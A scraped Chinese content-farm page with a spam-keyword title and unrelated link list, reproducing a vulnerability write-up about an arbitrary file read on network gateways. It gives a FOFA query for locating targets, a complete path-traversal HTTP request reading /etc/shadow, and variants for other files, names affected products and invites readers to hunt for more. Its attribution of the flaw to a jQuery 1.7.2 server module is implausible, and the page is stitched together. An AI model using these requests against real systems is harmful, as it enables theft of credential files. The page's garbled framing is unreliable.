当前位置: 首页 > news >正文

ip开源网站FPGA可以做点什么建设网站的工作职责

ip开源网站FPGA可以做点什么,建设网站的工作职责,app推广工作室,甘肃兰州地震最新消息刚刚jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库#xff0c;其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞#xff0c;攻击者可通过前台读取任意文件。 1.漏洞级别 高危 2.漏洞搜索 fofa bodywebui/js/jquerylib/jquery-1.7.2.m…jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞攻击者可通过前台读取任意文件。 1.漏洞级别 高危 2.漏洞搜索 fofa bodywebui/js/jquerylib/jquery-1.7.2.min.js3.影响范围 jQuery-1.7.24.漏洞复现 我们以使用该插件的安博通网关为例 构造 GET /webui/?file_name../../../../../etc/shadowgsys_dia_data_down HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: USGSESSIDddc4875e875c49403c35ccfbcef07db1 Upgrade-Insecure-Requests: 1 返回内容即为文件内容 不难看出file_name就是控制文件路径的参数我们可以简单的得出访问任意文件的构造访问 file_name../../../../../etc/shadow. /etc/shadow file_name../../../../../bin/bash /bin/bash漏洞相对比较简单。 5.后话 因为jquery是个非常常用的插件所以很多饮用该版本的系统都会存在漏洞大量的网关系统就因此中招了已知的就有这些。 如飞鱼星下一代防火墙安全网关;/任天行网络安全管理系统;等等很多很多。有兴趣大家可以自己找找看。 后续还会随文章附赠一个简单的利用脚本如果有问题欢迎随时沟通
http://www.zqtcl.cn/news/226985/

相关文章:

  • 重庆微信网站开发公司建设网站技术标准
  • 网站开发浏览器银川市建设诚信平台网站
  • 找合伙人做红木家具网站建设银行员工学习网站
  • iis的默认网站没有自动启动长春小程序开发制作
  • 佛山住房和城乡建设部网站wordpress 英文主题
  • 零食网站策划书厦门建设网站的公司
  • 自己做的网站怎么发布到网上湖南做网站 干净磐石网络
  • steam网站代做设计公司招聘信息
  • 网站开发 书籍无广告自助建站
  • 青岛电子商务网站建设wordpress购物车会员
  • 大理建网站沉默是金吉他谱
  • 门户网站需要多少费用wordpress的中文插件安装
  • 男做基视频网站怎么做网上直营店网站
  • 网站栏目排序个人站长网站应该如何定位
  • phpcms wap网站搭建学网站开发难吗
  • 做一个网页一般多少钱seo实训思考与总结
  • 怎么用wordpress做搜索网站wordpress 作品集插件
  • 芜湖的网站建设韩国封号事件网站建设
  • 做外贸网站的价格wordpress远方的雪
  • 有哪些做应援的网站网站开发产生费用分录怎么写
  • 如何在微信平台做购买网站广安 网站建设
  • 怎么建立和设计网站html5高端酒水饮料企业网站模版
  • 网站排版尺寸wordpress 生成目录
  • 网站建设属于什么费用wordpress破解管理员帐号
  • 东莞市官网网站建设专业wordpress主题开发
  • 常熟做网站优化合肥百度竞价推广代理公司
  • 专业做招聘的网站人气最旺的传奇手游
  • 西安网站建设新闻柳市专业网站托管
  • 网站怎么做移动端织梦网暂时关闭网站
  • 上海响应式网站建设企业seo 优化是什么